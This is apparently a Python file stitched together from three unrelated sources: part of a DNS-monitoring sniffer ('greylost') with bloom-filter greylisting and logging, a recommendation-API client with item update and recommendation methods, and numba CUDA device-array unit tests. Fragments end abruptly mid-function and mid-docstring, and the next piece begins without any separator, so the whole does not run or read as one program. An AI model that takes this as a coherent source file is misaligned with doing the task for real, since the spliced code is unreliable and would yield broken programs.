else:
rdata = str(response.rdata)
response_sorted_list.append({"rname": str(response.rname),
"rtype": DNS_RECORD_TYPES[response.rtype],
"rtype_id": response.rtype,
"rclass": response.rclass,
"rdata": rdata,
"ttl": response.ttl})
# Sort results to avoid logical duplicates in the bloom filter
return sorted(response_sorted_list, key=lambda k: k["rdata"])
def parse_dns_packet(packet):
""" parse_dns_packet() - Converts DNS packet to a dict.
Args:
packet (Packet object) - The packet to parse.
Returns:
dict representing the DNS packet.
"""
output = {}
output["timestamp"] = datetime.now().replace(microsecond=0).isoformat()
output["protocol"] = packet.protocol
output["saddr"] = packet.saddr
output["daddr"] = packet.daddr
output["sport"] = packet.sport
output["dport"] = packet.dport
try:
dns_packet = dnslib.DNSRecord.parse(packet.data)
except (dnslib.dns.DNSError, TypeError):
if packet.data:
# TODO don't encode if everything is printable
output["payload"] = b64encode(packet.data).decode("utf-8")
return output
output["id"] = dns_packet.header.id
output["q"] = dns_packet.header.q
output["a"] = dns_packet.header.a
if dns_packet.questions:
output["questions"] = []
for question in dns_packet.questions:
output["questions"].append({"qname": str(question.qname),
"qtype": DNS_RECORD_TYPES[question.qtype],
"qtype_id": question.qtype,
"qclass": question.qclass})
if dns_packet.rr:
output["rr"] = parse_dns_response(dns_packet.rr)
if dns_packet.auth:
output["auth"] = parse_dns_response(dns_packet.auth)
if dns_packet.ar:
output["ar"] = parse_dns_response(dns_packet.ar)
return output
def stdout_packet_json(packet_dict):
""" stdout_packet_json() - Prints DNS packet in JSON format to stdout.
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True
"""
print(json.dumps(packet_dict))
return True
def stdout_greylist_miss(packet_dict):
""" stdout_greylist_miss() - Prints greylist misses to stdout.
Args:
packet_dict (dict) - dict containing information about the packet.
Returns:
True
"""
print("Not in filter:", json.dumps(packet_dict, indent=4))
return True
def check_greylist_ignore_list(packet_dict):
""" check_greylist_ignore_list() - Check the greylist ignore list prior to
adding to the greylist; this benign and
trusted services such as Netflix that
have a ton of IP addresses and subdomains
from wasting space in the filter.
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True if query should be ignored.
False if query should be added to the greylist.
"""
try:
for question in packet_dict["questions"]:
for ignore in Settings.get("greylist_ignore_domains"):
if question["qname"].endswith(ignore):
return True
# .example.com. matches foo.example.com. and example.com.
if ignore.startswith(".") and question["qname"].endswith(ignore[1:]):
return True
except KeyError:
pass
return False
# TODO should I check responses too? need to collect more data...
# for response in ["rr", "ar", "auth"]:
# try:
# for chk in packet_dict[response]:
# for ign in Settings.get("greylist_ignore_domains"):
# if chk["rdata"].endswith(ign) or chk["rname"].endswith(ign):
# return True
# # .example.com. matches foo.example.com. and example.com.
# if ign[0] == "." and chk["rname"].endswith(ign[1:]):
# return True
# if ign[0] == "." and chk["rdata"].endswith(ign[1:]):
# return True
# except KeyError:
# pass
# return False
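# Illustrative matching behavior of the ignore list (domains are hypothetical):
#   entry 'netflix.com.'  matches 'api.netflix.com.' and 'netflix.com.' via
#     endswith -- note it would also match 'notnetflix.com.' (endswith is loose).
#   entry '.example.com.' matches 'foo.example.com.' via endswith and bare
#     'example.com.' via the ignore[1:] check above.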
def average_packet(packet):
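    """ average_packet() - Track query volume per (saddr, daddr) pair and, every
    10 seconds, roll the current counters into the RollingLog history used by
    the experimental traffic-spike detection below.
    Args:
        packet (Packet object) - Sniffed packet, or a falsey value to only
                                 age the counters.
    Returns:
        Nothing.
    """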
current = Settings.get("average_current")
if packet:
try:
current[packet.saddr + " " + packet.daddr] += 1
except KeyError:
current[packet.saddr + " " + packet.daddr] = 1
Settings.set("average_current", current)
history = Settings.get("average_history")
if (time() - Settings.get("average_last")) > 10:
for key in current:
if key in history.keys():
history[key].add(current[key])
else:
history[key] = RollingLog(60 * 10) # 60 * 10
history[key].add(current[key])
# Reap expired host pairs
current_keys = set(current.keys())
new_history = history
for key in history.copy():
if key not in current_keys:
new_history[key].add(0)
if set(history[key].log) == {0}:
new_history.pop(key)
del history
# Detect spikes in volume of traffic. This currently does not work
# correctly. It detects spikes in traffic, but takes several minutes
# or hours to correct itself.
# TODO if current minute is N% higher than average?
# TODO calculate median absolute deviation?
for x in new_history:
            z = [i for i in new_history[x].log if i is not None]
if len(z[:-1]) > 1:
print(x)
mean = statistics.mean(z[:-1])
stddev = statistics.stdev(z[:-1])
print(" ",
"SPIKE" if stddev > mean else "",
max(z),
mean,
new_history[x].log[-1],
stddev)
#if stddev > mean:
# print("SPIKE", x)
Settings.set("average_history", new_history)
Settings.set("average_current", {})
Settings.set("average_last", time())
def timefilter_packet(packet_dict):
""" timefilter_packet() - Add a packet to the greylist. This sorts and omits
volatile data such as port numbers, timestamps,
and the order of responses to prevent duplicate
elements from being added to the filter.
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True if element was successfully added to the filter.
False if element was not added to the filter.
"""
# Check if domain is in ignore list.
if check_greylist_ignore_list(packet_dict):
return False
timefilter = Settings.get("timefilter")
# Remove volatile fields before adding to bloom filter
element_dict = copy.copy(packet_dict)
element_dict.pop("timestamp")
element_dict.pop("sport")
element_dict.pop("dport")
try:
element_dict.pop("id")
except KeyError:
return False
element = json.dumps(element_dict)
# Are we still baselining DNS traffic?
elapsed = time() - Settings.get("starttime")
learning = not elapsed > Settings.get("filter_learning_time")
if timefilter.lookup(element) is False and not learning:
for method in Settings.get("greylist_miss_methods"):
# Log everything rather than stripped down element_dict
if method is _greylist_miss_log:
_greylist_miss_log(packet_dict)
continue
method(element_dict)
timefilter.add(element)
del element_dict
return True
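# Illustrative example of what is stored in the time filter: for a packet dict
# such as
#   {'timestamp': ..., 'saddr': '10.0.0.2', 'daddr': '10.0.0.1',
#    'sport': 51512, 'dport': 53, 'id': 4711, 'questions': [...], ...}
# the element is the JSON of that dict minus 'timestamp', 'sport', 'dport' and
# 'id', so repeats of the same query between the same hosts map to a single
# filter entry regardless of ports, query id or time of day.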
def all_log(packet_dict):
"""all_log() - log a DNS packet
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True if successful, False if unsuccessful
"""
log_fd = Settings.get("all_log_fd")
if log_fd:
log_fd.write(json.dumps(packet_dict) + "\n")
log_fd.flush()
return True
return False
def _greylist_miss_log(packet_dict):
"""_greylist_miss_log() - log a greylist miss
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True if successful, False if unsuccessful
"""
log_fd = Settings.get("greylist_miss_log_fd")
if log_fd:
log_fd.write(json.dumps(packet_dict) + "\n")
log_fd.flush()
return True
return False
def not_dns_log(packet_dict):
"""not_dns_log() - log non-DNS protocol traffic
Args:
packet_dict (dict) - dict derived from parse_dns_packet()
Returns:
True if successful, False if unsuccessful
"""
log_fd = Settings.get("not_dns_log_fd")
if log_fd:
log_fd.write(json.dumps(packet_dict) + "\n")
log_fd.flush()
return True
return False
def parse_cli(): # pylint: disable=R0915,R0912
"""parse_cli() -- parse CLI arguments
Args:
None
Returns:
Nothing
"""
description = "greylost by @dmfroberson"
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"--alllog",
default=False,
help="/path/to/all-log -- log of all DNS queries")
parser.add_argument(
"--notdnslog",
default=False,
help="/path/to/not-dns-log -- log of non-DNS protocol traffic")
parser.add_argument(
"--greylistmisslog",
default=False,
help="/path/to/greylist-miss-log -- log of greylist misses")
parser.add_argument(
"-b",
"--bpf",
default="port 53 or port 5353",
help="BPF filter to apply to the sniffer")
parser.add_argument(
"-d",
"--daemonize",
default=False,
action="store_true",
help="Daemonize")
parser.add_argument(
"--learningtime",
default=0,
type=int,
help="Time to baseline queries before alerting on greylist misses")
parser.add_argument(
"--logging",
default=False,
action="store_true",
help="Toggle logging")
parser.add_argument(
"--ignore",
default=None,
help="File containing list of domains to ignore when greylisting")
parser.add_argument(
"-i",
"--interface",
default="eth0",
help="Interface to sniff")
parser.add_argument(
"-o",
"--stdout",
action="store_true",
default=False,
help="Toggle stdout output")
parser.add_argument(
"-p",
"--precision",
default=0.001,
        type=float,
help="Precision of bloom filter. Ex: 0.001")
parser.add_argument(
"-r",
"--pidfile",
default=None,
help="Path to PID file")
parser.add_argument(
"--filterfile",
default=None,
help="Path to timefilter's state file.")
parser.add_argument(
"-s",
"--filtersize",
default=10000000,
type=int,
help="Size of bloom filter")
parser.add_argument(
"--statistics",
action="store_true",
help="Toggle statistics collection")
parser.add_argument(
"--syslog",
action="store_true",
help="Toggle syslog logging")
parser.add_argument(
"-t",
"--filtertime",
default=60*60*24,
type=int,
help="Filter time")
parser.add_argument(
"--toggle-all-log",
action="store_true",
help="Toggle all log")
parser.add_argument(
"--toggle-not-dns-log",
action="store_true",
help="Toggle not DNS log")
parser.add_argument(
"--toggle-greylist-miss-log",
action="store_true",
help="Toggle greylist miss log")
parser.add_argument(
"-v",
"--verbose",
default=False,
action="store_true",
help="Increase verbosity")
parser.add_argument(
"-w",
"--dumpfile",
default=None,
help="Write captured packets to a dumpfile")
args = parser.parse_args()
Settings.set("bpf", args.bpf)
Settings.set("interface", args.interface)
Settings.set("filter_size", args.filtersize)
Settings.set("filter_precision", args.precision)
Settings.set("filter_time", args.filtertime)
Settings.set("filter_learning_time", args.learningtime)
Settings.set("verbose", args.verbose)
Settings.set("daemonize", args.daemonize)
Settings.set("pcap_dumpfile", args.dumpfile)
if args.syslog:
Settings.toggle("syslog")
if args.toggle_all_log:
Settings.toggle("logging_all")
if args.toggle_not_dns_log:
Settings.toggle("logging_not_dns")
if args.toggle_greylist_miss_log:
Settings.toggle("logging_greylist_miss")
if args.statistics:
Settings.toggle("statistics")
if args.filterfile:
try:
with open(args.filterfile, "ab"):
pass
except PermissionError as exc:
error_fatal("Unable to open filter %s: %s" % (args.filterfile, exc),
exit_value=os.EX_OSFILE)
Settings.set("filter_file", args.filterfile)
if args.stdout:
packet_methods = Settings.get("packet_methods")
if stdout_packet_json not in packet_methods:
packet_methods.append(stdout_packet_json)
Settings.set("packet_methods", packet_methods)
'items': items_chunk,
'items_m2m': items_m2m_chunk,
}
if wait_for_completion is not None:
data['wait_for_completion'] = wait_for_completion
self.api.put(path=path, data=data, timeout=60)
@require_login
def partial_update_item(self, item, create_if_missing=None):
"""
Partially update some properties of an item.
:param dict item: item ID and properties {'item_id': ID, *<property_name: property_value>}
:param bool? create_if_missing: control whether an error should be returned or a new item
should be created when the ``item_id`` does not already exist. (default: false)
"""
item = dict(item)
item_id = self._itemid2url(item.pop('item_id'))
path = f'items/{item_id}/'
data = {
'item': item,
}
if create_if_missing is not None:
data['create_if_missing'] = create_if_missing
return self.api.patch(path=path, data=data)
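    # Illustrative usage (not from the official docs; the client variable and
    # the property names below are assumptions):
    #
    #     client.partial_update_item(
    #         {'item_id': 'item-42', 'price': 9.99, 'tags': ['sale']},
    #         create_if_missing=True,
    #     )
    #
    # Only the supplied properties are modified; other properties already
    # stored for 'item-42' are left untouched.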
@require_login
def partial_update_items_bulk(self, items, items_m2m=None, create_if_missing=None,
chunk_size=(1 << 10)):
"""
Partially update some properties of many items.
:param array items: array with fields ['id': ID, *<property_name: value_type>]
contains only the non-repeated values,
:param array? items_m2m: dict of arrays for repeated values:
{
*<repeated_property_name: {
'name': str,
'array': array with fields ['item_index': uint32, 'value_id': value_type],
}>
}
:param bool? create_if_missing: control whether an error should be returned or a new item
should be created when the ``item_id`` does not already exist. (default: false)
:param int? chunk_size: split the requests in chunks of this size (default: 1K)
"""
path = f'items-bulk/'
data = {}
if create_if_missing is not None:
data['create_if_missing'] = create_if_missing
for items_chunk, items_m2m_chunk in self._chunk_items(items, items_m2m, chunk_size):
data['items'] = items_chunk
data['items_m2m'] = items_m2m_chunk
self.api.patch(path=path, data=data, timeout=60)
@require_login
def delete_item(self, item_id):
"""
Delete a single item; doesn't wait for task completion
:param bytes item_id:
"""
item_id_url = self._itemid2url(item_id)
self.api.delete(path=f'items/{item_id_url}/')
@require_login
def delete_items(self, items_id):
"""
Delete items; doesn't wait for task completion
:param ID-array items_id: items IDs
"""
data = {'items_id': self._itemid2body(items_id)}
self.api.delete(path='items-bulk/', data=data)
def _chunk_items(self, items, items_m2m, chunk_size):
items_m2m = items_m2m or []
# cast dict to list of dict
if isinstance(items_m2m, dict):
items_m2m = [{'name': name, 'array': array}
for name, array in items_m2m.items()]
n_chunks = int(numpy.ceil(len(items) / chunk_size))
for i in tqdm(range(n_chunks), disable=(True if n_chunks < 4 else None)):
start_idx = i * chunk_size
end_idx = (i + 1) * chunk_size
items_chunk = items[start_idx:end_idx]
# split M2M array-optimized if any
items_m2m_chunk = []
for m2m in items_m2m:
array = m2m['array']
if isinstance(array, numpy.ndarray):
mask = (array['item_index'] >= start_idx) & (array['item_index'] < end_idx)
array_chunk = array[mask] # does copy
array_chunk['item_index'] -= start_idx
else:
logging.warning('array-optimized many-to-many format is not efficient '
'with JSON. Use numpy arrays and pkl serializer instead')
array_chunk = [
{'item_index': row['item_index'] - start_idx, 'value_id': row['value_id']}
for row in array
if start_idx <= row['item_index'] < end_idx
]
items_m2m_chunk.append({'name': m2m['name'], 'array': array_chunk})
yield self._itemid2body(items_chunk), items_m2m_chunk
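    # Illustrative sketch of the array-optimized many-to-many format that
    # _chunk_items() handles most efficiently (the property name, dtype and
    # values below are made up; the field names follow the docstrings above):
    #
    #     tags_m2m = numpy.array(
    #         [(0, 7), (0, 9), (3, 7)],
    #         dtype=[('item_index', 'uint32'), ('value_id', 'uint32')],
    #     )
    #     items_m2m = [{'name': 'tags', 'array': tags_m2m}]
    #
    # A plain list of dicts also works, but it falls back to the slower
    # row-by-row filtering branch above and triggers the warning.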
# === Reco: Item-to-item ===
@require_login
def get_reco_item_to_items(self, item_id, amt=None, cursor=None,
scenario=None, filters=None, reranking=None,
skip_default_scenario=None):
"""
Get similar items.
:param ID item_id: item ID
:param int? amt: amount to return (default: use the API default)
:param str? cursor: Pagination cursor
:param str? scenario: name of scenario
:param list-str? filters: Item-property filters. Filter format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_VALUE>',...]
:param list-str? reranking: Item-property reranking. Format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_WEIGHT>:<OPTIONS>']
:param bool? skip_default_scenario: True to skip default scenario if any
:returns: {
'items_id': array of items IDs,
'next_cursor': str, pagination cursor to use in next request to get more items,
}
"""
item_id = self._itemid2url(item_id)
path = f'recommendation/items/{item_id}/items/'
params = {}
if amt:
params['amt'] = amt
if cursor:
params['cursor'] = cursor
if filters:
params['filters'] = filters
if reranking:
params['reranking'] = reranking
if scenario:
params['scenario'] = scenario
if skip_default_scenario is not None:
params['skip_default_scenario'] = skip_default_scenario
resp = self.api.get(path=path, params=params)
resp['items_id'] = self._body2itemid(resp['items_id'])
return resp
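    # Illustrative call (the item ID, property names, operator names and
    # scenario are assumptions; the filter/reranking strings follow the
    # format documented above):
    #
    #     reco = client.get_reco_item_to_items(
    #         'item-42',
    #         amt=10,
    #         filters=['price:lt:100', 'genres:eq:drama'],
    #         scenario='product-page',
    #     )
    #     similar_ids = reco['items_id']
    #     next_page = reco['next_cursor']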
# === Reco: Session-to-item ===
@require_login
def get_reco_session_to_items(self, ratings=None, user_properties=None,
amt=None, cursor=None, scenario=None, filters=None,
reranking=None, exclude_rated_items=None,
skip_default_scenario=None):
"""
Get items recommendations given the ratings of an anonymous session.
:param array? ratings: ratings array with fields ['item_id': ID, 'rating': float]
:param dict? user_properties: user properties {**property_name: property_value(s)}
:param int? amt: amount to return (default: use the API default)
:param str? cursor: Pagination cursor
:param str? scenario: scenario name
:param list-str? filters: Item-property filters. Filter format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_VALUE>',...]
:param list-str? reranking: Item-property reranking. Format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_WEIGHT>:<OPTIONS>']
:param bool? exclude_rated_items: exclude rated items from response
:param bool? skip_default_scenario: True to skip default scenario if any
:returns: {
'items_id': array of items IDs,
'next_cursor': str, pagination cursor to use in next request to get more items,
}
"""
path = f'recommendation/sessions/items/'
data = {}
if ratings is not None:
data['ratings'] = self._itemid2body(ratings)
if user_properties:
data['user_properties'] = user_properties
if amt:
data['amt'] = amt
if cursor:
data['cursor'] = cursor
if filters:
data['filters'] = filters
if reranking:
data['reranking'] = reranking
if exclude_rated_items is not None:
data['exclude_rated_items'] = exclude_rated_items
if scenario:
data['scenario'] = scenario
if skip_default_scenario is not None:
data['skip_default_scenario'] = skip_default_scenario
resp = self.api.post(path=path, data=data)
resp['items_id'] = self._body2itemid(resp['items_id'])
return resp
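    # Illustrative ratings payload for an anonymous session (IDs and rating
    # values are made up; the shape follows the docstring above):
    #
    #     ratings = [
    #         {'item_id': 'item-1', 'rating': 4.5},
    #         {'item_id': 'item-7', 'rating': 2.0},
    #     ]
    #     reco = client.get_reco_session_to_items(ratings=ratings, amt=5)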
# === Reco: User-to-item ===
@require_login
def get_reco_user_to_items(self, user_id, amt=None, cursor=None, scenario=None,
filters=None, reranking=None,
exclude_rated_items=None, skip_default_scenario=None):
"""
Get items recommendations given a user ID.
:param ID user_id: user ID
:param int? amt: amount to return (default: use the API default)
:param str? cursor: Pagination cursor
:param str? scenario: scenario's name
:param list-str? filters: Item-property filters. Filter format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_VALUE>',...]
:param list-str? reranking: Item-property reranking. Format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_WEIGHT>:<OPTIONS>']
:param bool? exclude_rated_items: exclude rated items from response
:param bool? skip_default_scenario: True to skip default scenario if any
:returns: {
'items_id': array of items IDs,
'next_cursor': str, pagination cursor to use in next request to get more items,
}
"""
user_id = self._userid2url(user_id)
path = f'recommendation/users/{user_id}/items/'
params = {}
if amt:
params['amt'] = amt
if cursor:
params['cursor'] = cursor
if filters:
params['filters'] = filters
if reranking:
params['reranking'] = reranking
if exclude_rated_items is not None:
params['exclude_rated_items'] = exclude_rated_items
if scenario:
params['scenario'] = scenario
if skip_default_scenario is not None:
params['skip_default_scenario'] = skip_default_scenario
resp = self.api.get(path=path, params=params)
resp['items_id'] = self._body2itemid(resp['items_id'])
return resp
# === Reco: User-to-item-property ===
@require_login
def get_reco_user_to_item_properties(self, user_id, property_name: str, amt=None):
"""
Recommends item-property values given a user ID
:param bytes user_id:
:param str property_name:
:param int? amt: (default 16) maximal number of property values to return for each property
:raises: NotFoundError when data not found
:raises: RequestError if property missing
:return: {'properties': [n,] np.array, n<=amt}
"""
user_id = self._userid2url(user_id)
path = f'recommendation/users/{user_id}/items-properties/{property_name}/'
params = {}
if amt:
params['amt'] = amt
resp = self.api.get(path=path, params=params)
return resp
# === Reco: Session-to-item with Context Items ===
@require_login
def get_reco_session_to_items_w_ctx_items(
self, context_items, ratings=None, user_properties=None, amt=None, cursor=None,
scenario=None, filters=None, reranking=None, exclude_rated_items=None,
skip_default_scenario=None):
"""
Get items recommendations given the ratings of an anonymous session and context items ID.
:param array context_items: context items ID array with fields ['item_id': ID]
:param array? ratings: ratings array with fields ['item_id': ID, 'rating': float]
:param dict? user_properties: user properties {**property_name: property_value(s)}
:param int? amt: amount to return (default: use the API default)
:param str? cursor: Pagination cursor
:param str? scenario: scenario name
:param list-str? filters: Item-property filters. Filter format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_VALUE>',...]
:param list-str? reranking: Item-property reranking. Format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_WEIGHT>:<OPTIONS>']
:param bool? exclude_rated_items: exclude rated items from response
:param bool? skip_default_scenario: True to skip default scenario if any
:returns: {
'items_id': array of items IDs,
'next_cursor': str, pagination cursor to use in next request to get more items,
}
"""
path = f'recommendation/context-items/sessions/items/'
data = {
'context_items': context_items,
}
if ratings is not None:
data['ratings'] = self._itemid2body(ratings)
if user_properties:
data['user_properties'] = user_properties
if amt:
data['amt'] = amt
if cursor:
data['cursor'] = cursor
if filters:
data['filters'] = filters
if reranking:
data['reranking'] = reranking
if exclude_rated_items is not None:
data['exclude_rated_items'] = exclude_rated_items
if scenario:
data['scenario'] = scenario
if skip_default_scenario is not None:
data['skip_default_scenario'] = skip_default_scenario
resp = self.api.post(path=path, data=data)
resp['items_id'] = self._body2itemid(resp['items_id'])
return resp
# === Reco: User-to-item with Context Items ===
@require_login
def get_reco_user_to_items_w_ctx_items(
self, context_items, user_id, amt=None, cursor=None, scenario=None, filters=None,
reranking=None, exclude_rated_items=None, skip_default_scenario=None):
"""
Get items recommendations given a user ID and context items ID.
:param array context_items: context items ID array with fields ['item_id': ID]
:param ID user_id: user ID
:param int? amt: amount to return (default: use the API default)
:param str? cursor: Pagination cursor
:param str? scenario: scenario's name
:param list-str? filters: Item-property filters. Filter format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_VALUE>',...]
        :param list-str? reranking: Item-property reranking. Format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_WEIGHT>:<OPTIONS>']
import numpy as np
from numba.cuda.cudadrv import devicearray
from numba import cuda
from numba.cuda.testing import unittest, CUDATestCase
from numba.cuda.testing import skip_on_cudasim
class TestCudaNDArray(CUDATestCase):
def test_device_array_interface(self):
dary = cuda.device_array(shape=100)
devicearray.verify_cuda_ndarray_interface(dary)
ary = np.empty(100)
dary = cuda.to_device(ary)
devicearray.verify_cuda_ndarray_interface(dary)
ary = np.asarray(1.234)
dary = cuda.to_device(ary)
        self.assertEqual(dary.ndim, 1)
devicearray.verify_cuda_ndarray_interface(dary)
def test_device_array_from_readonly(self):
ary = np.arange(100, dtype=np.float32)
# Make the array readonly
ary.flags.writeable = False
self.assertFalse(ary.flags.writeable)
# Ensure that we can copy the readonly array
dary = cuda.to_device(ary)
retr = dary.copy_to_host()
np.testing.assert_array_equal(retr, ary)
def test_devicearray_dtype(self):
dary = cuda.device_array(shape=(100,), dtype="f4")
self.assertEqual(dary.dtype, np.dtype("f4"))
def test_devicearray_no_copy(self):
array = np.arange(100, dtype=np.float32)
cuda.to_device(array, copy=False)
def test_devicearray_shape(self):
ary = np.arange(2 * 3 * 4).reshape(2, 3, 4)
dary = cuda.to_device(ary)
        self.assertEqual(ary.shape, dary.shape)
        self.assertEqual(ary.shape[1:], dary.shape[1:])
def test_devicearray(self):
array = np.arange(100, dtype=np.int32)
original = array.copy()
gpumem = cuda.to_device(array)
array[:] = 0
gpumem.copy_to_host(array)
np.testing.assert_array_equal(array, original)
def test_stream_bind(self):
stream = cuda.stream()
with stream.auto_synchronize():
arr = cuda.device_array(
(3, 3),
dtype=np.float64,
stream=stream)
self.assertEqual(arr.bind(stream).stream, stream)
self.assertEqual(arr.stream, stream)
def test_len_1d(self):
ary = np.empty((3,))
dary = cuda.device_array(3)
self.assertEqual(len(ary), len(dary))
def test_len_2d(self):
ary = np.empty((3, 5))
dary = cuda.device_array((3, 5))
self.assertEqual(len(ary), len(dary))
def test_len_3d(self):
ary = np.empty((3, 5, 7))
dary = cuda.device_array((3, 5, 7))
self.assertEqual(len(ary), len(dary))
def test_devicearray_partition(self):
N = 100
array = np.arange(N, dtype=np.int32)
original = array.copy()
gpumem = cuda.to_device(array)
left, right = gpumem.split(N // 2)
array[:] = 0
self.assertTrue(np.all(array == 0))
right.copy_to_host(array[N//2:])
left.copy_to_host(array[:N//2])
self.assertTrue(np.all(array == original))
def test_devicearray_replace(self):
N = 100
array = np.arange(N, dtype=np.int32)
original = array.copy()
gpumem = cuda.to_device(array)
cuda.to_device(array * 2, to=gpumem)
gpumem.copy_to_host(array)
np.testing.assert_array_equal(array, original * 2)
@skip_on_cudasim('This works in the simulator')
def test_devicearray_transpose_wrongdim(self):
gpumem = cuda.to_device(np.array(np.arange(12)).reshape(3, 4, 1))
with self.assertRaises(NotImplementedError) as e:
np.transpose(gpumem)
self.assertEqual(
"transposing a non-2D DeviceNDArray isn't supported",
str(e.exception))
def test_devicearray_transpose_identity(self):
# any-shape identities should work
original = np.array(np.arange(24)).reshape(3, 4, 2)
array = np.transpose(cuda.to_device(original), axes=(0, 1, 2)).copy_to_host()
self.assertTrue(np.all(array == original))
def test_devicearray_transpose_duplicatedaxis(self):
gpumem = cuda.to_device(np.array(np.arange(12)).reshape(3, 4))
with self.assertRaises(ValueError) as e:
np.transpose(gpumem, axes=(0, 0))
self.assertIn(
str(e.exception),
container=[
'invalid axes list (0, 0)', # GPU
'repeated axis in transpose', # sim
])
def test_devicearray_transpose_wrongaxis(self):
gpumem = cuda.to_device(np.array(np.arange(12)).reshape(3, 4))
with self.assertRaises(ValueError) as e:
np.transpose(gpumem, axes=(0, 2))
self.assertIn(
str(e.exception),
container=[
'invalid axes list (0, 2)', # GPU
'invalid axis for this array',
'axis 2 is out of bounds for array of dimension 2', # sim
])
def test_devicearray_view_ok(self):
original = np.array(np.arange(12), dtype="i2").reshape(3, 4)
array = cuda.to_device(original)
for dtype in ("i4", "u4", "i8", "f8"):
with self.subTest(dtype=dtype):
np.testing.assert_array_equal(
array.view(dtype).copy_to_host(),
original.view(dtype)
)
def test_devicearray_view_ok_not_c_contig(self):
original = np.array(np.arange(32), dtype="i2").reshape(4, 8)
array = cuda.to_device(original)[:, ::2]
original = original[:, ::2]
np.testing.assert_array_equal(
array.view("u2").copy_to_host(),
original.view("u2")
)
def test_devicearray_view_bad_not_c_contig(self):
original = np.array(np.arange(32), dtype="i2").reshape(4, 8)
array = cuda.to_device(original)[:, ::2]
with self.assertRaises(ValueError) as e:
array.view("i4")
self.assertEqual(
"To change to a dtype of a different size,"
" the array must be C-contiguous",
str(e.exception))
def test_devicearray_view_bad_itemsize(self):
original = np.array(np.arange(12), dtype="i2").reshape(4, 3)
array = cuda.to_device(original)
with self.assertRaises(ValueError) as e:
array.view("i4")
self.assertEqual(
"When changing to a larger dtype,"
" its size must be a divisor of the total size in bytes"
" of the last axis of the array.",
str(e.exception))
def test_devicearray_transpose_ok(self):
original = np.array(np.arange(12)).reshape(3, 4)
array = np.transpose(cuda.to_device(original)).copy_to_host()
self.assertTrue(np.all(array == original.T))
def test_devicearray_transpose_T(self):
original = np.array(np.arange(12)).reshape(3, 4)
array = cuda.to_device(original).T.copy_to_host()
self.assertTrue(np.all(array == original.T))
def test_devicearray_contiguous_slice(self):
# memcpys are dumb ranges of bytes, so trying to
# copy to a non-contiguous range shouldn't work!
a = np.arange(25).reshape(5, 5, order='F')
s = np.full(fill_value=5, shape=(5,))
d = cuda.to_device(a)
a[2] = s
# d is in F-order (not C-order), so d[2] is not contiguous
# (40-byte strides). This means we can't memcpy to it!
with self.assertRaises(ValueError) as e:
d[2].copy_to_device(s)
self.assertEqual(
devicearray.errmsg_contiguous_buffer,
str(e.exception))
# if d[2].copy_to_device(s), then this would pass:
# self.assertTrue((a == d.copy_to_host()).all())
def _test_devicearray_contiguous_host_copy(self, a_c, a_f):
"""
Checks host->device memcpys
"""
self.assertTrue(a_c.flags.c_contiguous)
self.assertTrue(a_f.flags.f_contiguous)
for original, copy in [
(a_f, a_f),
(a_f, a_c),
(a_c, a_f),
(a_c, a_c),
]:
msg = '%s => %s' % (
'C' if original.flags.c_contiguous else 'F',
'C' if copy.flags.c_contiguous else 'F',
)
d = cuda.to_device(original)
d.copy_to_device(copy)
self.assertTrue(np.all(d.copy_to_host() == a_c), msg=msg)
self.assertTrue(np.all(d.copy_to_host() == a_f), msg=msg)
def test_devicearray_contiguous_copy_host_3d(self):
a_c = np.arange(5 * 5 * 5).reshape(5, 5, 5)
a_f = np.array(a_c, order='F')
self._test_devicearray_contiguous_host_copy(a_c, a_f)
def test_devicearray_contiguous_copy_host_1d(self):
a_c = np.arange(5)
a_f = np.array(a_c, order='F')
self._test_devicearray_contiguous_host_copy(a_c, a_f)
def test_devicearray_contiguous_copy_device(self):
a_c = np.arange(5 * 5 * 5).reshape(5, 5, 5)
a_f = np.array(a_c, order='F')
self.assertTrue(a_c.flags.c_contiguous)
self.assertTrue(a_f.flags.f_contiguous)
d = cuda.to_device(a_c)
with self.assertRaises(ValueError) as e:
d.copy_to_device(cuda.to_device(a_f))
self.assertEqual(
"incompatible strides: {} vs. {}".format(a_c.strides, a_f.strides),
str(e.exception))
d.copy_to_device(cuda.to_device(a_c))
self.assertTrue(np.all(d.copy_to_host() == a_c))
d = cuda.to_device(a_f)
with self.assertRaises(ValueError) as e:
d.copy_to_device(cuda.to_device(a_c))
self.assertEqual(
"incompatible strides: {} vs. {}".format(a_f.strides, a_c.strides),
str(e.exception))
d.copy_to_device(cuda.to_device(a_f))
self.assertTrue(np.all(d.copy_to_host() == a_f))
def test_devicearray_broadcast_host_copy(self):
try:
broadcast_to = np.broadcast_to
except AttributeError:
# numpy<1.10 doesn't have broadcast_to. The following implements
# a limited broadcast_to that only works along already existing
# dimensions of length 1.
def broadcast_to(arr, new_shape):
new_strides = []
for new_length, length, stride in zip(
new_shape, arr.shape, arr.strides
):
if length == 1 and new_length > 1:
new_strides.append(0)
elif new_length == length:
new_strides.append(stride)
else:
raise ValueError(
"cannot broadcast shape {} to shape {}"
.format(arr.shape, new_shape)
)
return np.ndarray(
buffer=np.squeeze(arr),
dtype=arr.dtype,
shape=new_shape,
strides=tuple(new_strides),
)
broadsize = 4
coreshape = (2, 3)
coresize = np.prod(coreshape)
core_c = np.arange(coresize).reshape(coreshape, order='C')
core_f = np.arange(coresize).reshape(coreshape, order='F')
for dim in range(len(coreshape)):
newindex = (slice(None),) * dim + (np.newaxis,)
broadshape = coreshape[:dim] + (broadsize,) + coreshape[dim:]
broad_c = broadcast_to(core_c[newindex], broadshape)
broad_f = broadcast_to(core_f[newindex], broadshape)
dbroad_c = cuda.to_device(broad_c)
dbroad_f = cuda.to_device(broad_f)
np.testing.assert_array_equal(dbroad_c.copy_to_host(), broad_c)
np.testing.assert_array_equal(dbroad_f.copy_to_host(), broad_f)
# Also test copying across different core orderings
dbroad_c.copy_to_device(broad_f)
